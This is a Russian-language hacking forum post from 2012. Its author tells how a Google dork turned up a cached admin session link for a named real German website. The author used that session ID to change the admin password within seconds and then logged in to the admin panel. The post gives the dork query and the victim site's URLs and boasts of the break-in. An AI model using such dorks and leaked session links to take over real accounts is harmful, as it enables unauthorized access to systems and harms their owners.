26.02.2012, 12:34
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332
Репутация:
38
|
|
Небольшая уязвимость найденная мной случайно.
Суть примерно такая:
Сессия админа кэшируется гуглом, и по дорку
Сообщение от None
allinurl:"users.php?action=edit" inurl:"userid"
Я нашел ссылку
Сообщение от None
http://www.die-melmacs.de/acp/users.php?action=edit&userid=1&sid=bc2a628e25a19d4 8e729f5fddfb66e0f
Перешел на страницу редактирования профиля, в течение 10 секунд сменил пароль.
Сообщение от None
http://www.die-melmacs.de/acp/index.php
Тут ввел логин и свой пароль.
Я внутри
P.S. Незнаю боян, не боян. Наткнулся случайно. Если кто-то поможет проанализировать - буду признателен. |
|
|